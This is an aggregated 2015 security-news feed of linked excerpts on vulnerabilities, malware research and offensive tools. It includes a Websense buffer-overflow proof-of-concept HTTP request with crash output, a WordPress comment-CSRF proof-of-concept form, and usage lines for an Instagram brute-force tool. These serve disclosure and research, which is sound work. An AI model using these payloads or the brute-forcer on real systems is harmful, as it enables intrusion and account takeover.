The iOS process explorer now provides full core dump of any PID - both ARMv7 and ARMv8

August 4, 2015, 8:28 am

≫ Next: avast! TaskEx RPC EoP (and potential RCE)

≪ Previous: DYLD_PRINT_TO_FILE exploit found in the wild

If the Windows process explorer can provide core dumps, why can't we? I decided to integrate some of my coreuption tools into Process Explorer, so it now provides a full dump of any PID you so choose - presently on iOS only, but for both 32-bit and 64-bit. Usage could not be simpler

more here...................http://newosxbook.com/forum/viewtopic.php?f=3&t=16587

↧

avast! TaskEx RPC EoP (and potential RCE)

August 4, 2015, 3:48 pm

≫ Next: Android MediaServer Bug Traps Phones in Endless Reboots

≪ Previous: The iOS process explorer now provides full core dump of any PID - both ARMv7 and ARMv8

Here is a new bug, this time in English. Since most of the logic issues have been dealt with, this one will be a memory corruption, with exploit. Once again, it was patched about a year ago by the avast! team.

Summary
Bug type: stack overflow
Vector: LPC (or RPC if the ncacn_ip_tcp Chest endpoint is enabled)
Impact: EoP (or unauthenticated RCE)
Verified on: avast! Free ashTaskEx.dll v9.0.2018.391

Description
The ashTaskEx.dll implements an RPC interface that is bound to a local ncalrpc endpoint, this interface being 908d4c23-138f-4ac5-af4a-08584ae7c67b v1.0. Most of the functions offered by this interface do not enforce any specific checks and are accessible by unprivileged local users. Those functions are processed within the AvastSvc.exe binary, which runs as SYSTEM.

more here............................http://expertmiami.blogspot.com/2015/08/avast-taskex-rpc-eop-and-potential-rce.html

↧

Android MediaServer Bug Traps Phones in Endless Reboots

August 4, 2015, 5:47 pm

≫ Next: Kaspersky DDoS Intelligence Report Q2 2015

≪ Previous: avast! TaskEx RPC EoP (and potential RCE)

We have discovered a new vulnerability that allows attackers to perform denial of service (DoS) attacks on Android’s mediaserver program. This causes a device’s system to reboot and drain all its battery life. In more a severe case, where a related malicious app is set to auto-start, the device can be trapped in an endless reboot and rendered unusable.

The vulnerability, CVE-2015-3823, affects Android versions 4.0.1 Jelly Bean to 5.1.1 Lollipop. Around 89% of the Android users (roughly 9 in 10 Android devices active as of June 2015) are affected. However, we have yet to discover active attacks in the wild that exploit this vulnerability.

This discovery comes hot on the heels of two other major vulnerabilities in Android’s media server component that surfaced last week. One can 27 Comments while the other, Stagefright, can be used to install malware through a multimedia message.

more here............................http://blog.trendmicro.com/trendlabs-security-intelligence/android-mediaserver-bug-traps-phones-in-endless-reboots/

↧

Kaspersky DDoS Intelligence Report Q2 2015

August 4, 2015, 5:55 pm

≫ Next: CVE-2015-3290: Linux privilege escalation due to nested NMIs interrupting espfix64

≪ Previous: Android MediaServer Bug Traps Phones in Endless Reboots

Of all Q2 2015 events in the world of DDoS attacks and tools with which to launch them, we picked out those which, in our opinion, best illustrate the main trends with which these threats evolve. Cybercriminals do the following:

Invent and use new techniques aimed at launching more powerful attacks without increasing botnet sizes;
Create botnets of devices connected to the Internet, and use them to carry out DDoS attacks;
Develop DDoS modules for malware toolkits with which to carry out targeted attacks.

more here....................https://securelist.com/analysis/quarterly-malware-reports/71663/kaspersky-ddos-intelligence-report-q2-2015/

↧

CVE-2015-3290: Linux privilege escalation due to nested NMIs interrupting espfix64

August 4, 2015, 8:49 pm

≫ Next: SEC Consult SA-20150805-0 :: Websense Content Gateway Stack Buffer Overflow in handle_debug_network

≪ Previous: Kaspersky DDoS Intelligence Report Q2 2015

On 07/22/2015 11:12 AM, Andy Lutomirski wrote:
> +++++ CVE-2015-3290 +++++
>
> High impact NMI bug on x86_64 systems 3.13 and newer, embargoed. Also fixed by:
>
> https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=9b6e6a8334d56354853f9c255d1395c2ba570e0a
>
> The other fix (synchronous modify_ldt) does *not* fix CVE-2015-3290.
>
> You can mitigate CVE-2015-3290 by blocking modify_ldt or
> perf_event_open using seccomp. A fully-functional, portable, reliable
> exploit is privately available and will be published in a week or two.
> *Patch your systems*

And here's a real advisory:

If an NMI returns via espfix64 and is interrupted during espfix64 setup
by another NMI, the return state is corrupt. This is exploitable for
reliable privilege escalation on any Linux x86_64 system in which
untrusted code can arrange for espfix64 to be invoked and for NMIs to be
nested.

read on here............................http://www.openwall.com/lists/oss-security/2015/08/04/8

↧

SEC Consult SA-20150805-0 :: Websense Content Gateway Stack Buffer Overflow in handle_debug_network

August 5, 2015, 4:07 am

≫ Next: Exploring Qualcomm's TrustZone implementation

≪ Previous: CVE-2015-3290: Linux privilege escalation due to nested NMIs interrupting espfix64

SEC Consult Vulnerability Lab Security Advisory < 20150805-0 >
=======================================================================
title: Stack buffer overflow in handle_debug_network
product: Websense Triton Content Manager
vulnerable version: 8.0.0 build 1165
fixed version: V8.0.0 HF02
CVE number: CVE-2015-5718
impact: high
homepage: www.websense.com
found: 2015-04-13
by: C. Schwarz (Office Bangkok)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Berlin - Frankfurt/Main - Montreal - Singapore
Vienna (HQ) - Vilnius - Zurich

https://www.sec-consult.com
=======================================================================

Vendor description:
- -------------------
Websense Content Gateway (Content Gateway) is a Linux-based, high-performance Web
proxy and cache that provides real-time content scanning and Web site classification
to protect network computers from malicious Web content while controlling employee
access to dynamic, user-generated Web 2.0 content. Web content has evolved from a
static information source to a sophisticated platform for 2-way communications,
which can be a valuable productivity tool when adequately secured.

URL: http://www.websense.com/content/support/library/deployctr/v76/dic_wcg.aspx

Business recommendation:
- ------------------------
Attackers are able to completely compromise the Websense Content Manager with
combined targeted attack vectors.

The scope of the test, where the vulnerabilities have been identified, was a
very short crash-test of the application. It is assumed that further
vulnerabilities exist within this product.

Vulnerability overview/description:
- -----------------------------------
A stack-based buffer overflow was identified in the Websense Content Manager
administrative interface, which allows to write past the 512 bytes sized buffer
"dest" when calling "strcpy" in "handle_debug_network". The vulnerability can be
used in combination with a CSRF attack to crash the system or execute arbitrary
code.

Proof of concept:
- -----------------
A single HTTP request is sufficient to crash the content_manager binary application:

POST /submit_net_debug.cgi?mode=0&menu=0&item=4&tab=1 HTTP/1.1
Host: <content gateway>:8081
[...]
Content-Length: 869

record_version=10479%3A70&submit_from_page=%2Fmonitor%2Fm_net_debug.ink&cmd_name=1&cmd_param=[Ax2048]&cmd_status=0&troute_install=0&tdump_install=0&cmd_action=1&cate=ping&cate=asd&apply=apply

Below is the GDB output of the process memory, most of the CPU's registers including
the stack pointer of various previous frames are overwritten with the value of 'A'.

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7f122b073700 (LWP 50174)]
0x00000000006becb1 in handle_debug_network (whc=<value optimized out>, tag=<value optimized out>,
arg=<value optimized out>) at
/home/cmbuild/Compass-Proxy/src/dev/WCG/traffic/proxy/mgmt2/web2/WebHttpRender.cc:997
997 /home/cmbuild/Compass-Proxy/src/dev/WCG/traffic/proxy/mgmt2/web2/WebHttpRender.cc: No such
file or directory.
in /home/cmbuild/Compass-Proxy/src/dev/WCG/traffic/proxy/mgmt2/web2/WebHttpRender.cc
(gdb) i r
rax 0x0 0
rbx 0x4141414141414141 4702111234474983745
rcx 0x125c0 75200
rdx 0xda3f 55871
rsi 0x3541360 55841632
rdi 0x1 1
rbp 0x4141414141414141 0x4141414141414141
rsp 0x7f122b070618 0x7f122b070618
r8 0x4141414141414141 4702111234474983745
r9 0x4141414141414141 4702111234474983745
r10 0x4141414141414141 4702111234474983745
r11 0x3f2c35a350 271324652368
r12 0x4141414141414141 4702111234474983745
r13 0x4141414141414141 4702111234474983745
r14 0x4141414141414141 4702111234474983745
r15 0x4141414141414141 4702111234474983745
rip 0x6becb1 0x6becb1 <handle_debug_network(WebHttpContext*, char const*, char*)+561>
eflags 0x10206 [ PF IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) bt
#0 0x00000000006becb1 in handle_debug_network (whc=<value optimized out>, tag=<value optimized
out>, arg=<value optimized out>) at
/home/cmbuild/Compass-Proxy/src/dev/WCG/traffic/proxy/mgmt2/web2/WebHttpRender.cc:997
#1 0x4141414141414141 in ?? ()
#2 0x4141414141414141 in ?? ()
#3 0x4141414141414141 in ?? ()
#4 0x4141414141414141 in ?? ()
#5 0x4141414141414141 in ?? ()
#6 0x4141414141414141 in ?? ()
#7 0x4141414141414141 in ?? ()
#8 0x4141414141414141 in ?? ()
#9 0x4141414141414141 in ?? ()
#10 0x4141414141414141 in ?? ()
#11 0x4141414141414141 in ?? ()
#12 0x4141414141414141 in ?? ()
#13 0x4141414141414141 in ?? ()
#14 0x4141414141414141 in ?? ()
#15 0x4141414141414141 in ?? ()
#16 0x4141414141414141 in ?? ()
#17 0x0000000000000000 in ?? ()
(gdb)

Vulnerable / tested versions:
- -----------------------------
Websense Triton Content Manager 8.0.0 build 1165

Vendor contact timeline:
- ------------------------
2015-05-18: Contacting vendor
2015-06-02: established secure communication channel
2015-06-03: sending advisory draft
2015-06-24: requesting update from vendor
2015-07-16: requesting update from vendor
2015-07-20: requesting update from vendor
2015-07-24: Websense states that hotfix V8.0.0 HF02 was released on 2015-06-10
2015-08-05: Public advisory release

Solution:
- ---------
The vulnerability has beed fixed in hotfix V8.0.0 HF02.
http://www.websense.com/support/article/kbarticle/v8-0-0-About-Hotfix-02-for-Websense-Content-Gateway

Workaround:
- -----------
No workaround available.

Advisory URL:
- -------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Berlin - Frankfurt/Main - Montreal - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Christoph Schwarz / @2015

↧

Exploring Qualcomm's TrustZone implementation

August 5, 2015, 7:07 am

≫ Next: Bypassing Malware Scanning in Sophos UTM Web Protection - Again

≪ Previous: SEC Consult SA-20150805-0 :: Websense Content Gateway Stack Buffer Overflow in handle_debug_network

In this blog post, we'll be exploring Qualcomm's TrustZone implementation, as present on Snapdragon SoCs. If you haven't already, you might want to read the previous blog post, in which I go into some detail about TrustZone in general.

Where do we start?

First of all, since Qualcomm's TrustZone implementation is closed-source, and as far as I could tell, there are no public documents detailing its architecture or design, we will probably need to reverse-engineer the binary containing the TrustZone code, and analyse it.

more here.................................http://bits-please.blogspot.com/2015/08/exploring-qualcomms-trustzone.html

↧

Bypassing Malware Scanning in Sophos UTM Web Protection - Again

August 5, 2015, 10:26 am

≫ Next: Who’s Behind Your Proxy? Uncovering Bunitu’s Secrets

≪ Previous: Exploring Qualcomm's TrustZone implementation

This article describes several ways of employing uncommon or invalid HTTP responses to transport malware from server to client without being detected by Sophos UTM Web Protection. All of these bypasses got reported to Sophos and most of them are fixed by now.

more here.......................http://noxxi.de/research/sophos-utm-webprotection-bypass2.html

↧

Who’s Behind Your Proxy? Uncovering Bunitu’s Secrets

August 5, 2015, 10:29 am

≫ Next: PCRE Library Heap Overflow Vulnerability

≪ Previous: Bypassing Malware Scanning in Sophos UTM Web Protection - Again

In our previous analysis we showed how the Bunitu Trojan was distributed via the Neutrino exploit kit in various malvertising campaigns. After spending more time analyzing the proxy, we realized that the requests we were receiving were not related to ad-fraud activity (as we initially suspected) but instead appeared to be for some sort of VPN service.

We believe that the operators of the Bunitu botnet are selling access to infected proxy bots as a way to monetize their botnet. People using certain VPN service providers to protect their privacy are completely unaware that the backend uses a criminal infrastructure of infected computers worldwide.

more here.........................https://blog.malwarebytes.org/botnets/2015/08/whos-behind-your-proxy-uncovering-bunitus-secrets/

↧

PCRE Library Heap Overflow Vulnerability

August 5, 2015, 11:26 am

≫ Next: Comment form CSRF in WordPress 4.2.2 allows admin impersonation via comments

≪ Previous: Who’s Behind Your Proxy? Uncovering Bunitu’s Secrets

PCRE is a regular expression C library inspired by the regular expression capabilities in the Perl programming language. The PCRE library is incorporated into a number of prominent programs, such as Adobe Flash, Apache, Nginx, PHP.

PCRE library is prone to a vulnerability which leads to Heap Overflow. During the compilation of a malformed regular expression, more data is written on the malloced block than the expected size output by compile_regex. Exploits with advanced Heap Fengshui techniques may allow an attacker to execute arbitrary code in the context of the user running the affected application.

more here.........................https://bugs.exim.org/show_bug.cgi?id=1667

↧

Comment form CSRF in WordPress 4.2.2 allows admin impersonation via comments

August 5, 2015, 12:44 pm

≫ Next: PowerShell Empire

≪ Previous: PCRE Library Heap Overflow Vulnerability

Details
================
Software: WordPress
Version: 3.8.1,3.8.2,4.2.2
Homepage: http://wordpress.org/
Advisory report: https://security.dxw.com/advisories/comment-form-csrf-allows-admin-impersonation-via-comments-in-wordpress-4-2-2/
CVE: Awaiting assignment
CVSS: 4.3 (Medium; AV:N/AC:M/Au:N/C:N/I:P/A:N)

Description
================
Comment form CSRF in WordPress 4.2.2 allows admin impersonation via comments

Vulnerability
================
When posting comments,WordPress does not require a nonce value (unless posting unfiltered HTML). This means that an attacker can force a logged-in user to post arbitrary comments.
For this to happen, the logged-in user would have to be tricked into clicking on a link controlled by the attacker. It is easy to make these links very convincing.
The line which verifies the nonce when using unfiltered HTML is line 154 of wp-comments-post.php.
EDIT: this issue has been known about since 2009, but it appears that no fix is planned https://core.trac.wordpress.org/ticket/10931

Proof of concept
================
Log in, visit an URL containing the following (replacing localhost as appropriate, replacing 1 with the ID of a post), click submit:
<form method=\"POST\" action=\"http://localhost/wp-comments-post.php\">
<input type=\"text\" name=\"comment_post_ID\" value=\"1\">
<input type=\"text\" name=\"comment\" value=\"UH OH\">
<input type=\"submit\">
</form>

(In a real attack the form can be made to auto-submit using Javascript)

Mitigations
================
Disable comments until a new version is released that fixes this bug

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/

Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this report with 14 days.

Timeline
================

2009-10-19: Ticket raised by mtdewvirus
2014-03-20: Discovered independently by dxw
2015-07-14: Reported to security@wordpress.org
2015-07-14: Requested CVE
2015-07-17: Response from nikolay@automattic.com
2015-08-05: Published

Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.

↧

PowerShell Empire

August 5, 2015, 1:09 pm

≫ Next: InstaBrute

≪ Previous: Comment form CSRF in WordPress 4.2.2 allows admin impersonation via comments

Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework.

more here.....................https://github.com/PowerShellEmpire/Empire

↧

InstaBrute

August 5, 2015, 1:15 pm

≫ Next: SuiteCRM Post Auth Shell Upload Race Condition Exploit (Video Demo)

≪ Previous: PowerShell Empire

Description

Instagram bruteforce exploit module

Usage

Usage: instaBrute -h

Dependencies

Mechanize
CookieLib
Simplejson
OptParse

Example

python instaBrute.py -f usernames.txt -d dictionary.txt
python instaBrute.py -u facebook -d dictionary.txt

Features

Check username existence
Check password for a given username
Brute forcer

more here......................https://github.com/chinoogawa/instaBrute

↧

SuiteCRM Post Auth Shell Upload Race Condition Exploit (Video Demo)

August 5, 2015, 2:01 pm

≫ Next: PeStudio Advisory

≪ Previous: InstaBrute

In version 7.2.2-max of SuiteCRM the SuiteCRM developers patched a post-authentication shell upload vulnerability disclosed by Darren Martyn of Xiphos Research Ltd, however, despite his warnings, their patch did absolutely nothing to fix the underlying vulnerability and simply made it exploitable again via a race condition.

This video demonstrates reliable exploitation of said race condition to spawn a reverse shell on the affected host. Doubtlessly, their patch for this will introduce more vulnerabilities.

Video here............................https://www.youtube.com/watch?v=eHVIg5eoYNc

↧

PeStudio Advisory

August 5, 2015, 3:13 pm

≫ Next: Threat Group-3390 Targets Organizations for Cyberespionage

≪ Previous: SuiteCRM Post Auth Shell Upload Race Condition Exploit (Video Demo)

PeStudio is a utility used by a number of security professionals that carry's out the static analysis of 32-bit and 64-bit Windows executable files.

As described on winitor.com "malicious executable attempts to hide its malicious intents and to evade detection. In doing so, it generally presents anomalies and suspicious patterns. The goal of pestudio is to detect these anomalies, provide indicators and score the executable being analyzed."

Unfortunately Marc Ochsenmeier found that there appears to be several (Russian) instances of malware using pestudioprompt.exe as camouflage. Here is as file recently uploaded on VirusTotal as an example https://www.virustotal.com/en/file/00db74346f844eadb5d88b4c84b8110e5908749140728e64355ab561d40a8536/analysis/. Therefore it is recommended that if you are going to download this tool please access it solely from http://www.winitor.com.

↧

Threat Group-3390 Targets Organizations for Cyberespionage

August 5, 2015, 3:19 pm

≫ Next: White Paper: Server-Side Template Injection

≪ Previous: PeStudio Advisory

Dell SecureWorks Counter Threat Unit(TM) (CTU) researchers investigated activities associated with Threat Group-3390[1] (TG-3390). Analysis of TG-3390's operations, targeting, and tools led CTU researchers to assess with moderate confidence the group is located in the People's Republic of China. The threat actors target a wide range of organizations: CTU researchers have observed TG-3390 actors obtaining confidential data on defense manufacturing projects, but also targeting other industry verticals and attacking organizations involved in international relations. The group extensively uses long-running strategic web compromises[2] (SWCs), and relies on whitelists to deliver payloads to select victims. In comparison to other threat groups, TG-3390 is notable for its tendency to compromise Microsoft Exchange servers using a custom backdoor and credential logger.

more here.................................http://www.secureworks.com/cyber-threat-intelligence/threats/threat-group-3390-targets-organizations-for-cyberespionage/

↧

White Paper: Server-Side Template Injection

August 5, 2015, 4:29 pm

≫ Next: PSRecon Live Incident Response and Forensic Data Acquisition PowerShell script

≪ Previous: Threat Group-3390 Targets Organizations for Cyberespionage

Template engines are widely used by web applications to present dynamic data via web pages and emails. Unsafely embedding user input in templates enables Server-Side Template Injection, a frequently critical vulnerability that is extremely easy to mistake for Cross-Site Scripting (XSS), or miss entirely. Unlike XSS, Template Injection can be used to directly attack web servers' internals and often obtain Remote Code Execution (RCE), turning every vulnerable application into a potential pivot point.

Template Injection can arise both through developer error, and through the intentional exposure of templates in an attempt to offer rich functionality, as commonly done by wikis, blogs, marketing applications and content management systems. Intentional template injection is such a common use-case that many template engines offer a 'sandboxed' mode for this express purpose. This paper defines a methodology for detecting and exploiting template injection, and shows it being applied to craft RCE zerodays for two widely deployed enterprise web applications. Generic exploits are demonstrated for five of the most popular template engines, including escapes from sandboxes whose entire purpose is to handle user-supplied templates in a safe way.

more here..................https://portswigger.net/knowledgebase/papers/ServerSideTemplateInjection.pdf

↧

PSRecon Live Incident Response and Forensic Data Acquisition PowerShell script

August 5, 2015, 6:08 pm

≫ Next: Nuclear EK traffic patterns in August 2015

≪ Previous: White Paper: Server-Side Template Injection

PSRecon gathers data from a remote Windows host using PowerShell (v2 or later), organizes the data into folders, hashes all extracted data, hashes PowerShell and various system properties, and sends the data off to the security team. The data can be pushed to a share, sent over email, or retained locally.

One nice part about the report is that everything is self-contained, making it easy to share as there is no reliance on a centralize server. Even the images are encoded directly into the report's HTML

This script also includes endpoint lockdown functionality. This can be useful when working through a malware outbreak incident, especially when there is risk that the malware will spread to a share or other critical systems within the enterprise. Sometimes the quickest and most effective way to stop the spread of malware is to simply knock the host offline until IT/Security can respond, following the extraction of forensic data. Alternatively to quarantining the host, PSRecon allows you to disable an active directory account as well.

Ideally, this script should be integrated with the organization's Active Defense frameworks to automate rapid forensic data acquisition and lock down the endpoint.

more here........................https://github.com/gfoss/PSRecon/

↧

Nuclear EK traffic patterns in August 2015

August 5, 2015, 6:17 pm

≫ Next: White Paper: Abusing Windows Management Instrumentation (WMI) to Build a Persistent, Asyncronous, and Fileless Backdoor (Inclusive BlackHat 2015 slide presentations and more 1st Day)

≪ Previous: PSRecon Live Incident Response and Forensic Data Acquisition PowerShell script

About two weeks ago, Nuclear exploit kit (EK) changed its URL patterns. Now it looks a bit like Angler EK. Kafeine originally announced the change on 2015-07-21 [1], and we collected examples the next day.

Here's how Nuclear EK looked on 2015-07-20 [2]:

Here's how Nuclear EK appeared two days later on 2015-07-22 after the change [1]:

Now that we're into August 2015, URL patterns for Nuclear EK have altered again. These changes are similar to what we've seen with Angler EK since June 2015 [3]. They're not the same URL patterns as Angler, but the changes are similar.

In today's diary, we examine Nuclear EK traffic as of Tuesday, 2015-08-04. In this example, the EK delivered Troldesh ransomware, which is similar to a previous infection I published earlier this year in April 2015 [4].

First, let's see how the 2015-08-04 traffic from a compromised website led to Nuclear EK here.............https://isc.sans.edu/diary/Nuclear+EK+traffic+patterns+in+August+2015/20001

↧

White Paper: Abusing Windows Management Instrumentation (WMI) to Build a Persistent, Asyncronous, and Fileless Backdoor (Inclusive BlackHat 2015 slide presentations and more 1st Day)

August 6, 2015, 5:25 am

≫ Next: iOS Masque Attack Weaponized: A Real World Look

≪ Previous: Nuclear EK traffic patterns in August 2015

As technology is introduced and subsequently deprecated over time in the Windows operating system, one powerful technology that has remained consistent since Windows NT 4.01 and Windows 952 is Windows Management Instrumentation (WMI). Present on all Windows operating systems, WMI is comprised of a powerful set of tools used to manage Windows systems both locally and remotely.

While it has been well known and utilized heavily by system administrators since its inception, WMI was likely introduced to the mainstream security community when it was discovered that it was used maliciously as one component in the suite of exploits and implants used by Stuxnet3 . Since then, WMI has been gaining popularity amongst attackers for its ability to perform system reconnaissance, AV and VM detection, code execution, lateral movement, persistence, and data theft.

As attackers increasingly utilize WMI, it is important for defenders, incident responders, and forensic analysts to have knowledge of WMI and to know how they can wield it to their advantage. This whitepaper will introduce the reader to WMI, actual and proof-of-concept attacks using WMI, how WMI can be used as a rudimentary intrusion detection system (IDS), and how to perform forensics on the WMI repository file format.

more here......................https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf

and slides here..........................https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor.pdf

BlackHat 2015 presentation slides/white papers - Day 1 here.............https://www.blackhat.com/us-15/briefings.html

↧

Latest Images